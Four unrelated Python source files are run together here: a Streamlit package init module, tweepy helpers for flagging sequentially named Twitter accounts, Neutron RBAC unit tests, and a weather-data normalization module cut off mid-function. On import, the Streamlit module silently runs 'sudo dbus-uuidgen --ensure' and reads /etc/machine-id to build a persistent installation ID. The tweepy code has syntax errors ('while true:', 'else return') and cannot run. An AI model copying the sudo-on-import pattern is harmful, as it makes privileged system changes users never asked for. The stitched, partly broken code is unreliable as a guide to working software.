# Copyright 2018-2020 Streamlit Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Streamlit. How to use Streamlit in 3 seconds: 1. Write an app >>> import streamlit as st >>> st.write(anything_you_want) 2. Run your app $ streamlit run my_script.py 3. Use your app A new tab will open on your browser. That's your Streamlit app! 4. Modify your code, save it, and watch changes live on your browser. Take a look at the other commands in this module to find out what else Streamlit can do: >>> dir(streamlit) Or try running our "Hello World": $ streamlit hello For more detailed info, see https://docs.streamlit.io. """ # IMPORTANT: Prefix with an underscore anything that the user shouldn't see. # NOTE: You'll see lots of "noqa: F821" in this file. That's because we # manually mess with the local namespace so the linter can't know that some # identifiers actually exist in the namespace. # Must be at the top, to avoid circular dependency. from streamlit import logger as _logger from streamlit import config as _config _LOGGER = _logger.get_logger("root") # Give the package a version. import pkg_resources as _pkg_resources import uuid as _uuid import subprocess import platform import os from typing import Any, List, Tuple, Type # This used to be pkg_resources.require('streamlit') but it would cause # pex files to fail. See #394 for more details. __version__ = _pkg_resources.get_distribution("streamlit").version # Deterministic Unique Streamlit User ID if ( platform.system() == "Linux" and os.path.isfile("/etc/machine-id") == False and os.path.isfile("/var/lib/dbus/machine-id") == False ): print("Generate machine-id") subprocess.run(["sudo", "dbus-uuidgen", "--ensure"]) machine_id = str(_uuid.getnode()) if os.path.isfile("/etc/machine-id"): with open("/etc/machine-id", "r") as f: machine_id = f.read() elif os.path.isfile("/var/lib/dbus/machine-id"): with open("/var/lib/dbus/machine-id", "r") as f: machine_id = f.read() __installation_id__ = str(_uuid.uuid5(_uuid.NAMESPACE_DNS, machine_id)) import contextlib as _contextlib import re as _re import sys as _sys import textwrap as _textwrap import threading as _threading import traceback as _traceback import types as _types import json as _json import numpy as _np from streamlit import code_util as _code_util from streamlit import env_util as _env_util from streamlit import source_util as _source_util from streamlit import string_util as _string_util from streamlit import type_util as _type_util from streamlit.DeltaGenerator import DeltaGenerator as _DeltaGenerator from streamlit.ReportThread import add_report_ctx as _add_report_ctx from streamlit.ReportThread import get_report_ctx as _get_report_ctx from streamlit.errors import StreamlitAPIException from streamlit.proto import BlockPath_pb2 as _BlockPath_pb2 from streamlit.util import functools_wraps as _functools_wraps # Modules that the user should have access to. These are imported with "as" # syntax pass mypy checking with implicit_reexport disabled. from streamlit.caching import cache as cache # noqa: F401 # This is set to True inside cli._main_run(), and is False otherwise. # If False, we should assume that DeltaGenerator functions are effectively # no-ops, and adapt gracefully. _is_running_with_streamlit = False def _set_log_level(): _logger.set_log_level(_config.get_option("global.logLevel").upper()) _logger.init_tornado_logs() # Make this file only depend on config option in an asynchronous manner. This # avoids a race condition when another file (such as a test file) tries to pass # in an alternative config. _config.on_config_parsed(_set_log_level, True) _main = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.MAIN) sidebar = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.SIDEBAR) # DeltaGenerator methods: altair_chart = _main.altair_chart # noqa: E221 area_chart = _main.area_chart # noqa: E221 audio = _main.audio # noqa: E221 balloons = _main.balloons # noqa: E221 bar_chart = _main.bar_chart # noqa: E221 bokeh_chart = _main.bokeh_chart # noqa: E221 button = _main.button # noqa: E221 checkbox = _main.checkbox # noqa: E221 code = _main.code # noqa: E221 dataframe = _main.dataframe # noqa: E221 date_input = _main.date_input # noqa: E221 deck_gl_chart = _main.deck_gl_chart # noqa: E221 pydeck_chart = _main.pydeck_chart # noqa: E221 empty = _main.empty # noqa: E221 error = _main.error # noqa: E221 exception = _main.exception # noqa: E221 beta_set_favicon = _main.favicon # noqa: E221 file_uploader = _main.file_uploader # noqa: E221 graphviz_chart = _main.graphviz_chart # noqa: E221 header = _main.header # noqa: E221 help = _main.help # noqa: E221 image = _main.image # noqa: E221 info = _main.info # noqa: E221 json = _main.json # noqa: E221 latex = _main.latex # noqa: E221 line_chart = _main.line_chart # noqa: E221 map = _main.map # noqa: E221 markdown = _main.markdown # noqa: E221 multiselect = _main.multiselect # noqa: E221 number_input = _main.number_input # noqa: E221 plotly_chart = _main.plotly_chart # noqa: E221 progress = _main.progress # noqa: E221 pyplot = _main.pyplot # noqa: E221 radio = _main.radio # noqa: E221 selectbox = _main.selectbox # noqa: E221 slider = _main.slider # noqa: E221 subheader = _main.subheader # noqa: E221 success = _main.success # noqa: E221 table = _main.table # noqa: E221 text = _main.text # noqa: E221 text_area = _main.text_area # noqa: E221 text_input = _main.text_input # noqa: E221 time_input = _main.time_input # noqa: E221 title = _main.title # noqa: E221 vega_lite_chart = _main.vega_lite_chart # noqa: E221 video = _main.video # noqa: E221 warning = _main.warning # noqa: E221 beta_color_picker = _main.beta_color_picker # noqa: E221 # Config get_option = _config.get_option def set_option(key, value): """Set config option. Currently, only two config options can be set within the script itself: * client.caching * client.displayEnabled Calling with any other options will raise StreamlitAPIException. Run `streamlit config show` in the terminal to see all available options. Parameters ---------- key : str The config option key of the form "section.optionName". To see all available options, run `streamlit config show` on a terminal. value The new value to assign to this config option. """ opt = _config._config_options[key] if opt.scriptable: _config.set_option(key, value) return raise StreamlitAPIException( "{key} cannot be set on the fly. Set as command line option, e.g. streamlit run script.py --{key}, or in config.toml instead.".format( key=key ) ) # Special methods: _HELP_TYPES = ( _types.BuiltinFunctionType, _types.BuiltinMethodType, _types.FunctionType, _types.MethodType, _types.ModuleType, ) # type: Tuple[Type[Any], ...] def write(*args, **kwargs): """Write arguments to the app. This is the Swiss Army knife of Streamlit commands: it does different things depending on what you throw at it. Unlike other Streamlit commands, write() has some unique properties: 1. You can pass in multiple arguments, all of which will be written. 2. Its behavior depends on the input types as follows. 3. It returns None, so it's "slot" in the App cannot be reused. Parameters ---------- *args : any One or many objects to print to the App. Arguments are handled as follows: - write(string) : Prints the formatted Markdown string, with support for LaTeX expression and emoji shortcodes. See docs for st.markdown for more. - write(data_frame) : Displays the DataFrame as a table. - write(error) : Prints an exception specially. - write(func) : Displays information about a function. - write(module) : Displays information about the module. - write(dict) : Displays dict in an interactive widget. - write(obj) : The default is to print str(obj). - write(mpl_fig) : Displays a Matplotlib figure. - write(altair) : Displays an Altair chart. - write(keras) : Displays a Keras model. - write(graphviz) : Displays a Graphviz graph. - write(plotly_fig) : Displays a Plotly figure. - write(bokeh_fig) : Displays a Bokeh figure. - write(sympy_expr) : Prints SymPy expression using LaTeX. unsafe_allow_html : bool This is a keyword-only argument that defaults to False. By default, any HTML tags found in strings will be escaped and therefore treated as pure text. This behavior may be turned off by setting this argument to True. That said, *we strongly advise* against it*. It is hard to write secure HTML, so by using this argument you may be compromising your users' security. For more information, see: https://github.com/streamlit/streamlit/issues/152 **Also note that `unsafe_allow_html` is a temporary measure and may be removed from Streamlit at any time.** If you decide to turn on HTML anyway, we ask you to please tell us your exact use case here: https://discuss.streamlit.io/t/96 . This will help us come up with safe APIs that allow you to do what you want. Example ------- Its simplest use case is to draw Markdown-formatted text, whenever the input is a string: >>> write('Hello, *World!* :sunglasses:') .. output:: https://share.streamlit.io/0.50.2-ZWk9/index.html?id=Pn5sjhgNs4a8ZbiUoSTRxE height: 50px As mentioned earlier, `st.write()` also accepts other data formats, such as numbers, data frames, styled data frames, and assorted objects: >>> st.write(1234) >>> st.write(pd.DataFrame({ ... 'first column': [1, 2, 3, 4], ... 'second column': [10, 20, 30, 40], ... })) .. output:: https://share.streamlit.io/0.25.0-2JkNY/index.html?id=FCp9AMJHwHRsWSiqMgUZGD height: 250px Finally, you can pass in multiple arguments to do things like: >>> st.write('1 + 1 = ', 2) >>> st.write('Below is a DataFrame:', data_frame, 'Above is a dataframe.') .. output:: https://share.streamlit.io/0.25.0-2JkNY/index.html?id=DHkcU72sxYcGarkFbf4kK1 height: 300px Oh, one more thing: `st.write` accepts chart objects too! For example: >>> import pandas as pd >>> import numpy as np >>> import altair as alt >>> >>> df = pd.DataFrame( ... np.random.randn(200, 3), ... columns=['a', 'b', 'c']) ... >>> c = alt.Chart(df).mark_circle().encode( ... x='a', y='b', size='c', color='c', tooltip=['a', 'b', 'c']) >>> >>> st.write(c) .. output:: https://share.streamlit.io/0.25.0-2JkNY/index.html?id=8jmmXR8iKoZGV4kXaKGYV5 height: 200px """ try: string_buffer = [] # type: List[str] unsafe_allow_html = kwargs.get("unsafe_allow_html", False) def flush_buffer(): if string_buffer: markdown( " ".join(string_buffer), unsafe_allow_html=unsafe_allow_html, ) # noqa: F821 string_buffer[:] = [] for arg in args: # Order matters! if isinstance(arg, str): string_buffer.append(arg) elif _type_util.is_dataframe_like(arg): flush_buffer() if len(_np.shape(arg)) > 2: text(arg) else: dataframe(arg) # noqa: F821 elif isinstance(arg, Exception): flush_buffer() exception(arg) # noqa: F821 elif isinstance(arg, _HELP_TYPES): flush_buffer() help(arg) elif _type_util.is_altair_chart(arg): flush_buffer() altair_chart(arg) elif _type_util.is_type(arg, "matplotlib.figure.Figure"): flush_buffer() pyplot(arg) elif _type_util.is_plotly_chart(arg): flush_buffer() plotly_chart(arg) elif _type_util.is_type(arg, "bokeh.plotting.figure.Figure"): flush_buffer() bokeh_chart(arg) elif _type_util.is_graphviz_chart(arg): flush_buffer() graphviz_chart(arg) elif _type_util.is_sympy_expession(arg): flush_buffer() latex(arg) elif _type_util.is_keras_model(arg): from tensorflow.python.keras.utils import vis_utils flush_buffer() dot = vis_utils.model_to_dot(arg) graphviz_chart(dot.to_string()) elif isinstance(arg, (dict, list)): flush_buffer() json(arg) elif _type_util.is_namedtuple(arg): flush_buffer() json(_json.dumps(arg._asdict())) elif _type_util.is_pydeck(arg): flush_buffer() pydeck_chart(arg) else: string_buffer.append("`%s`" % str(arg).replace("`", "\\`")) flush_buffer() except Exception: _, exc, exc_tb = _sys.exc_info() exception(exc, exc_tb) # noqa: F821 def experimental_show(*args): """Write arguments and *argument names* to your app for debugging purposes. Show() has similar properties to write(): 1. You can pass in multiple arguments, all of which will be debugged. 2. It returns None, so it's "slot" in the app cannot be reused. Note: This is an experimental feature. See https://docs.streamlit.io/en/latest/pre_release_features.html for more information. Parameters ---------- *args : any One or many objects to debug in the App. Example ------- >>> dataframe = pd.DataFrame({ ... 'first column': [1, 2, 3, 4], ... 'second column': [10, 20, 30, 40], ... })) >>> st.experimental_show(dataframe) Notes ----- This is an experimental feature with usage limitations: - The method must be called with the name `show`. - Must be called in one line of code, and only once per line. - When passing multiple arguments the inclusion of `,` or `)` in a string argument may cause an error. """ if not args: return try: import inspect # Get the calling line of code current_frame = inspect.currentframe() if current_frame is None: warning("`show` not enabled in the shell") return lines = inspect.getframeinfo(current_frame.f_back)[3] if not lines: warning("`show` not enabled in the shell") return # Parse arguments from the line line = lines[0].split("show", 1)[1] inputs = _code_util.get_method_args_from_code(args, line) # Escape markdown and add deltas for idx, input in enumerate(inputs): escaped = _string_util.escape_markdown(input) markdown("**%s**" % escaped) write(args[idx]) except Exception: _, exc, exc_tb = _sys.exc_info() exception(exc, exc_tb) # noqa: F821 @_contextlib.contextmanager def spinner(text="In progress..."): """Temporarily displays a message while executing a block of code. Parameters ---------- text : str A message to display while executing that block Example ------- >>> with st.spinner('Wait for it...'): >>> time.sleep(5) >>> st.success('Done!') """ import streamlit.caching as caching # @st.cache optionally uses spinner for long-running computations. # Normally, streamlit warns the user when they call st functions # from within an @st.cache'd function. But we do *not* want to show # these warnings for spinner's message, so we create and mutate this # message delta within the "suppress_cached_st_function_warning" # context. with caching.suppress_cached_st_function_warning(): message = empty() try: # Set the message 0.1 seconds in the future to avoid annoying # flickering if this spinner runs too quickly. DELAY_SECS = 0.1 display_message = True display_message_lock = _threading.Lock() def set_message(): with display_message_lock: if display_message: with caching.suppress_cached_st_function_warning(): message.warning(str(text)) _add_report_ctx(_threading.Timer(DELAY_SECS, set_message)).start() # Yield control back to the context. yield finally: if display_message_lock: with display_message_lock: display_message = False with caching.suppress_cached_st_function_warning(): message.empty() _SPACES_RE = _re.compile("\\s*") @_contextlib.contextmanager def echo(code_location="above"): """Use in a `with` block to draw some code on the app, then execute it. Parameters ---------- code_location : "above" or "below" Whether to show the echoed code before or after the results of the executed code block. Example ------- >>> with st.echo(): >>> st.write('This code will be printed') """ if code_location == "below": show_code = code show_warning = warning else: placeholder = empty() # noqa: F821 show_code = placeholder.code show_warning = placeholder.warning try: frame = _traceback.extract_stack()[-3] filename, start_line = frame.filename, frame.lineno yield frame = _traceback.extract_stack()[-3] end_line = frame.lineno lines_to_display = [] # type: List[str] with _source_util.open_python_file(filename) as source_file: source_lines = source_file.readlines() lines_to_display.extend(source_lines[start_line:end_line]) match = _SPACES_RE.match(lines_to_display[0]) initial_spaces = match.end() if match else 0 for line in source_lines[end_line:]: match = _SPACES_RE.match(line) indentation = match.end() if match else 0 # The != 1 is because we want to allow '\n' between sections. if indentation != 1 and indentation < initial_spaces: break lines_to_display.append(line) line_to_display = _textwrap.dedent("".join(lines_to_display)) show_code(line_to_display, "python") except FileNotFoundError as err: show_warning("Unable to display code. %s" % err) def _transparent_write(*args): """This is just st.write, but returns the arguments you passed to it.""" write(*args) if len(args) == 1: return args[0] return args # We want to show a warning when the user runs a Streamlit script without # 'streamlit run', but we need to make sure the warning appears only once no # matter how many times __init__ gets loaded. _repl_warning_has_been_displayed = False def _maybe_print_repl_warning(): global _repl_warning_has_been_displayed if not _repl_warning_has_been_displayed: _repl_warning_has_been_displayed = True if _env_util.is_repl(): _LOGGER.warning( _textwrap.dedent( """ Will not generate Streamlit app To generate an app, use Streamlit in a file and run it with: $ streamlit run [FILE_NAME] [ARGUMENTS] """ ) ) elif _config.get_option("global.showWarningOnDirectExecution"): script_name = _sys.argv[0] _LOGGER.warning( _textwrap.dedent( """ Will not generate Streamlit App To generate an App, run this file with: $ streamlit run %s [ARGUMENTS] """ ), script_name, )
import tweepy import csv import time import timeit import datetime import re def tweetrate (listoftweets): #Takes a list of tweets of type tweepy.cursor(api.user_timeline,...), returns [rate of tweets in tweets per day (including fractional), total number of tweets in dataset, and the time period of the sample as a timedelta] tweet = [] for tweet1 in listoftweets: tweet.append(tweet1.created_at) length = len(tweet) datebegin = tweet[0] dateend = tweet[length-1] return [(length-1)/((datebegin-dateend).days + (datebegin-dateend).seconds/86400), length, datebegin-dateend] def maybe_enum (list, keep="off"): #Checks to see which of a list of user names end in a sequence of numbers, possibly indicating that a username was automatically generated in sequence. # #An example of this might be a number of accounts that look like "chair02003", "book20031", "world60063" - a clear pattern of words followed by 5 digit sequences. #Of course, there are a bunch of reasons people put numbers in their names organicaly-- "Trump2020". "SexySince1979". "n1ckn4m3", etc. # #By default, maybe_enum returns a 2d list where list[x] = [user name, digit at end of username], ignoring all usernames that don't end in digits. #If the variable 'keep' is set to "on" - i.e., calling it as maybe_enum(list,"on") - it won't ignore the usernames that don't end in digits, but instead handle those like this: ["nodigit", -1] outlist = [] for user in list: enum = re.search(r'\d+$', user) if enum is not None: outlist.append([user, enum.group()]) else: if keep == "on": outlist.append([user, -1]) return outlist def enum_sort (enums): #maybe you'd rather see your "maybe_enum" list in terms of how many names ended in sequences of digits of length (n). This will do that! Every outlist [n] = [total number of usernames ending in a sequence of length n, list of names fitting that criteria] outlist = [[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]],[0,[]]] for userstat in enums: outlist[len(userstat[1])][1].append(userstat[0]) outlist[len(userstat[1])][0] = outlist[len(userstat[1])][0] + 1 return outlist def hasfollowers (user, thresh = 1): #takes a user of type api.get_user(user) and checks if it has at least 'thresh' number of followers. If no thresh is given, defaults to 1 if user.friends_count > thresh: return (0) else: return (1) def hastweeted (listoftweets, thresh=1): #Takes a list of tweets of type tweepy.Cursor(api.user_timeline...) and tells you if the account has tweeted at least thresh times (thresh defaults to 1 tweet = [] for tweet1 in listoftweets: tweet.append (tweet1) if len(tweet) > thresh: return (1) else: return (0) def rate_limiter(api): #This function checks if you've hit any twitter API limits. If you have, this module will pause your program until the limits reset, #checking every 60 seconds to see if they have. # DUMMY CODE FOR TWEEPY ERROR HANDLING #try: # [Tweepy API Call] #except tweepy.error.RateLimitError: # rate_limit_check() rate_limit = api.rate_limit_status()["resources"] while true: for rate in rate_limit: endpoints = rate_limit[rate] for endpoint in endpoints: limit = rate_limit[rate][endpoint]["limit"] remaining = rate_limit[rate][endpoint]["remaining"] if remaining == 0: time.sleep(60) else return
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from unittest import mock from neutron_lib.callbacks import events from neutron_lib import context as n_context from neutron_lib.db import model_base from neutron_lib import exceptions as n_exc from neutron_lib.objects import common_types from oslo_versionedobjects import fields as obj_fields import sqlalchemy as sa from neutron.db import rbac_db_models from neutron.extensions import rbac as ext_rbac from neutron.objects import base from neutron.objects.db import api as obj_db_api from neutron.objects import rbac_db from neutron.tests.unit.objects import test_rbac from neutron.tests.unit import testlib_api class FakeDbModel(dict): pass class FakeRbacModel(rbac_db_models.RBACColumns, model_base.BASEV2): object_id = sa.Column(sa.String(36), nullable=False) object_type = 'fake_rbac_object' def get_valid_actions(self): return (rbac_db_models.ACCESS_SHARED,) @base.NeutronObjectRegistry.register_if(False) class FakeNeutronRbacObject(base.NeutronDbObject): VERSION = '1.0' db_model = FakeRbacModel fields = { 'object_id': obj_fields.StringField(), 'target_tenant': obj_fields.StringField(), 'action': obj_fields.StringField(), } @base.NeutronObjectRegistry.register_if(False) class FakeNeutronDbObject(rbac_db.NeutronRbacObject): # Version 1.0: Initial version VERSION = '1.0' rbac_db_cls = FakeNeutronRbacObject db_model = FakeDbModel fields = { 'id': common_types.UUIDField(), 'field1': obj_fields.StringField(), 'field2': obj_fields.StringField(), 'shared': obj_fields.BooleanField(default=False), } fields_no_update = ['id'] synthetic_fields = ['field2'] def get_bound_project_ids(cls, context, policy_id): pass class RbacNeutronDbObjectTestCase(test_rbac.RBACBaseObjectIfaceTestCase, testlib_api.SqlTestCase): _test_class = FakeNeutronDbObject def setUp(self): super(RbacNeutronDbObjectTestCase, self).setUp() FakeNeutronDbObject.update_post = mock.Mock() @mock.patch.object(_test_class.rbac_db_cls, 'db_model') def test_get_projects_with_shared_access_to_db_obj_return_project_ids( self, *mocks): ctx = mock.Mock() fake_ids = {'project_id_' + str(i) for i in range(10)} ctx.session.query.return_value.filter.return_value = [ (fake_id,) for fake_id in fake_ids] ret_ids = self._test_class._get_projects_with_shared_access_to_db_obj( ctx, 'fake_db_obj_id') self.assertEqual(fake_ids, ret_ids) def test_is_accessible_for_admin(self): ctx = mock.Mock(is_admin=True, project_id='we_dont_care') self.assertTrue(self._test_class.is_accessible(ctx, None)) def test_is_accessible_for_db_object_owner(self): ctx = mock.Mock(is_admin=False, project_id='db_object_owner') db_obj = mock.Mock(project_id=ctx.project_id) self.assertTrue(self._test_class.is_accessible(ctx, db_obj)) @mock.patch.object(_test_class, 'is_shared_with_project', return_value=True) def test_is_accessible_if_shared_with_project(self, mock_is_shared): ctx = mock.Mock(is_admin=False, project_id='db_object_shareholder') db_obj = mock.Mock(project_id='db_object_owner') self.assertTrue(self._test_class.is_accessible(ctx, db_obj)) mock_is_shared.assert_called_once_with( mock.ANY, db_obj.id, ctx.project_id) @mock.patch.object(_test_class, 'is_shared_with_project', return_value=False) def test_is_accessible_fails_for_unauthorized_project(self, mock_is_shared): ctx = mock.Mock(is_admin=False, project_id='Billy_the_kid') db_obj = mock.Mock(project_id='db_object_owner') self.assertFalse(self._test_class.is_accessible(ctx, db_obj)) mock_is_shared.assert_called_once_with( mock.ANY, db_obj.id, ctx.project_id) def _rbac_policy_generate_change_events(self, resource, trigger, context, object_type, policy, event_list): for event in event_list: payload = events.DBEventPayload( context, states=(policy,), metadata={'object_type': object_type}) if event == events.BEFORE_CREATE: payload.states = [] payload.request_body = policy self._test_class.validate_rbac_policy_change( resource, event, trigger, payload=payload) @mock.patch.object(_test_class, 'validate_rbac_policy_update') def test_validate_rbac_policy_change_handles_only_object_type( self, mock_validate_rbac_update): self._rbac_policy_generate_change_events( resource=None, trigger='dummy_trigger', context=None, object_type='dummy_object_type', policy=None, event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE, events.BEFORE_DELETE)) mock_validate_rbac_update.assert_not_called() @mock.patch.object(_test_class, 'validate_rbac_policy_update') @mock.patch.object(obj_db_api, 'get_object', return_value={'project_id': 'tyrion_lannister'}) def test_validate_rbac_policy_change_allowed_for_admin_or_owner( self, mock_get_object, mock_validate_update): context = mock.Mock(is_admin=True, project_id='db_obj_owner_id') self._rbac_policy_generate_change_events( resource=None, trigger='dummy_trigger', context=context, object_type=self._test_class.rbac_db_cls.db_model.object_type, policy={'object_id': 'fake_object_id'}, event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE)) self.assertTrue(self._test_class.validate_rbac_policy_update.called) @mock.patch.object(_test_class, 'validate_rbac_policy_update') @mock.patch.object(obj_db_api, 'get_object', return_value={'project_id': 'king_beyond_the_wall'}) def test_validate_rbac_policy_change_forbidden_for_outsiders( self, mock_get_object, mock_validate_update): context = mock.Mock(is_admin=False, project_id='db_obj_owner_id') self.assertRaises( n_exc.InvalidInput, self._rbac_policy_generate_change_events, resource=mock.Mock(), trigger='dummy_trigger', context=context, object_type=self._test_class.rbac_db_cls.db_model.object_type, policy={'object_id': 'fake_object_id'}, event_list=(events.BEFORE_CREATE, events.BEFORE_UPDATE)) self.assertFalse(mock_validate_update.called) @mock.patch.object(_test_class, '_validate_rbac_policy_delete') def _test_validate_rbac_policy_delete_handles_policy( self, policy, mock_validate_delete): payload = events.DBEventPayload( n_context.get_admin_context(), states=(policy,), metadata={ 'object_type': self._test_class.rbac_db_cls.db_model.object_type}) self._test_class.validate_rbac_policy_delete( resource=mock.Mock(), event=events.BEFORE_DELETE, trigger='dummy_trigger', payload=payload) mock_validate_delete.assert_not_called() def test_validate_rbac_policy_delete_handles_shared_action(self): self._test_validate_rbac_policy_delete_handles_policy( {'action': 'unknown_action'}) @mock.patch.object(obj_db_api, 'get_object') def test_validate_rbac_policy_delete_skips_db_object_owner(self, mock_get_object): policy = {'action': rbac_db_models.ACCESS_SHARED, 'target_tenant': 'fake_project_id', 'object_id': 'fake_obj_id', 'project_id': 'fake_project_id'} mock_get_object.return_value.project_id = policy['target_tenant'] self._test_validate_rbac_policy_delete_handles_policy(policy) @mock.patch.object(obj_db_api, 'get_object') @mock.patch.object(_test_class, 'get_bound_project_ids', return_value='project_id_shared_with') def test_validate_rbac_policy_delete_fails_single_project_and_in_use( self, get_bound_project_ids_mock, mock_get_object): policy = {'action': rbac_db_models.ACCESS_SHARED, 'target_tenant': 'project_id_shared_with', 'project_id': 'object_owner_project_id', 'object_id': 'fake_obj_id'} context = mock.Mock() with mock.patch.object( self._test_class, '_get_db_obj_rbac_entries') as target_tenants_mock: filter_mock = target_tenants_mock.return_value.filter filter_mock.return_value.count.return_value = 0 payload = events.DBEventPayload( context, states=(policy,), metadata={ 'object_type': self._test_class.rbac_db_cls.db_model.object_type}) self.assertRaises( ext_rbac.RbacPolicyInUse, self._test_class.validate_rbac_policy_delete, resource=None, event=events.BEFORE_DELETE, trigger='dummy_trigger', payload=payload) def test_validate_rbac_policy_delete_not_bound_project_success(self): context = mock.Mock() with mock.patch.object( self._test_class, 'get_bound_project_ids', return_value={'fake_tid2', 'fake_tid3'}), \ mock.patch.object(self._test_class, '_get_db_obj_rbac_entries') as get_rbac_entries_mock, \ mock.patch.object( self._test_class, '_get_projects_with_shared_access_to_db_obj') as sh_tids: get_rbac_entries_mock.filter.return_value.count.return_value = 0 self._test_class._validate_rbac_policy_delete( context=context, obj_id='fake_obj_id', target_tenant='fake_tid1') sh_tids.assert_not_called() @mock.patch.object(_test_class, '_get_db_obj_rbac_entries') @mock.patch.object(_test_class, '_get_projects_with_shared_access_to_db_obj', return_value=['some_other_project']) @mock.patch.object(_test_class, 'get_bound_project_ids', return_value={'fake_id1'}) def test_validate_rbac_policy_delete_fails_single_used_wildcarded( self, get_bound_project_ids_mock, mock_projects_with_shared_access, _get_db_obj_rbac_entries_mock): policy = {'action': rbac_db_models.ACCESS_SHARED, 'target_tenant': '*', 'project_id': 'object_owner_project_id', 'object_id': 'fake_obj_id'} context = mock.Mock() payload = events.DBEventPayload( context, states=(policy,), metadata={ 'object_type': self._test_class.rbac_db_cls.db_model.object_type}) with mock.patch.object(obj_db_api, 'get_object'): self.assertRaises( ext_rbac.RbacPolicyInUse, self._test_class.validate_rbac_policy_delete, resource=mock.Mock(), event=events.BEFORE_DELETE, trigger='dummy_trigger', payload=payload) @mock.patch.object(_test_class, 'attach_rbac') @mock.patch.object(obj_db_api, 'get_object', return_value=['fake_rbac_policy']) @mock.patch.object(_test_class, '_validate_rbac_policy_delete') def test_update_shared_avoid_duplicate_update( self, mock_validate_delete, get_object_mock, attach_rbac_mock): obj_id = 'fake_obj_id' obj = self._test_class(mock.Mock()) obj.update_shared(is_shared_new=True, obj_id=obj_id) get_object_mock.assert_called_with( obj.rbac_db_cls, mock.ANY, object_id=obj_id, target_tenant='*', action=rbac_db_models.ACCESS_SHARED) self.assertFalse(mock_validate_delete.called) self.assertFalse(attach_rbac_mock.called) @mock.patch.object(_test_class, 'attach_rbac') @mock.patch.object(obj_db_api, 'get_object', return_value=[]) @mock.patch.object(_test_class, '_validate_rbac_policy_delete') def test_update_shared_wildcard( self, mock_validate_delete, get_object_mock, attach_rbac_mock): obj_id = 'fake_obj_id' test_neutron_obj = self._test_class(mock.Mock()) test_neutron_obj.update_shared(is_shared_new=True, obj_id=obj_id) get_object_mock.assert_called_with( test_neutron_obj.rbac_db_cls, mock.ANY, object_id=obj_id, target_tenant='*', action=rbac_db_models.ACCESS_SHARED) attach_rbac_mock.assert_called_with( obj_id, test_neutron_obj.obj_context.project_id) def test_shared_field_false_without_context(self): test_neutron_obj = self._test_class() self.assertFalse(test_neutron_obj.to_dict()['shared']) @mock.patch.object(_test_class, 'attach_rbac') @mock.patch.object(obj_db_api, 'get_object', return_value=['fake_rbac_policy']) @mock.patch.object(_test_class, '_validate_rbac_policy_delete') def test_update_shared_remove_wildcard_sharing( self, mock_validate_delete, get_object_mock, attach_rbac_mock): obj_id = 'fake_obj_id' obj = self._test_class(mock.Mock()) obj.update_shared(is_shared_new=False, obj_id=obj_id) get_object_mock.assert_called_with( obj.rbac_db_cls, mock.ANY, object_id=obj_id, target_tenant='*', action=rbac_db_models.ACCESS_SHARED) self.assertFalse(attach_rbac_mock.attach_rbac.called) mock_validate_delete.assert_called_with(mock.ANY, obj_id, '*') @mock.patch.object(_test_class, 'create_rbac_policy') def test_attach_rbac_returns_type(self, create_rbac_mock): obj_id = 'fake_obj_id' project_id = 'fake_project_id' target_tenant = 'fake_target_project' self._test_class(mock.Mock()).attach_rbac(obj_id, project_id, target_tenant) rbac_pol = create_rbac_mock.call_args_list[0][0][1]['rbac_policy'] self.assertEqual(rbac_pol['object_id'], obj_id) self.assertEqual(rbac_pol['target_tenant'], target_tenant) self.assertEqual(rbac_pol['action'], rbac_db_models.ACCESS_SHARED) self.assertEqual(rbac_pol['object_type'], self._test_class.rbac_db_cls.db_model.object_type)
"""Various constants and distributions that decribe our dataset. Intended use is normalization of the fields before sending them to a neural net. See notebook distributions-of-parameters.ipynb""" import logging import numpy as np import torch import random import xarray as xr from .util import add_biweekly_dim, obs_to_biweekly, std_estimator, fix_s2s_dataset_dims _logger = logging.getLogger(__name__) FIELD_MEAN = { "gh10": 30583.0, "gh100": 16070.0, "gh1000": 76.19, "gh200": 11765.0, "gh500": 5524.374, "gh850": 1403.0, "lsm": 0.0, "msl": 100969.28, "orog": 387.1, "siconc": 0.17, "sst": 286.96, "st100": 268.75, "st20": 268.69, "sm20": 250.68, "t2m": 278.2237, "tp": 34.1, "u1000": -0.17, "u850": 1.26, "u500": 6.43, "u200": 14.43, "u100": 5.30, "v1000": 0.18, "v850": 0.11, "v500": -0.03, "v200": -0.01, "v100": 0.10, } FIELD_STD = { "gh10": 993.0, "gh100": 577.0, "gh1000": 110.14, "gh200": 605.0, "gh500": 341.80862, "gh850": 149.6, "lsm": 1.0, "msl": 1343.6, "orog": 856.0, "siconc": 0.35, "sst": 11.73, "st100": 26.74, "st20": 26.91, "sm20": 125.99, "tp": 43.7, "t2m": 21.2692, "u1000": 6.09, "u850": 8.07, "u500": 11.73, "u200": 17.76, "u100": 12.02, "v1000": 5.22, "v850": 6.144, "v500": 9.03, "v200": 12.18, "v100": 6.57, } def normalize_dataset(dataset): for v in dataset.data_vars: dataset[v] = (dataset[v] - FIELD_MEAN[v]) / FIELD_STD[v] return dataset def denormalize_dataset(dataset): for v in dataset.data_vars: dataset[v] = (dataset[v] * FIELD_STD[v]) + FIELD_MEAN[v] return dataset def apply_to_all(transform, example): """Utility function to apply a transform on all the kews of an example.""" new_example = {} for k in example: new_example[k] = transform(example[k]) return new_example class AddBiweeklyDimTransform: """Transform that takes a training example and adds the biweekly dimension to it.""" def __init__(self, weeks_12=False, features=False): self.weeks_12 = weeks_12 self.features = features def __call__(self, example): to_transform = ["model", "obs"] if self.features: to_transform.append("features") new_example = {} for k in example: if k in to_transform: new_example[k] = add_biweekly_dim(example[k], weeks_12=self.weeks_12) else: 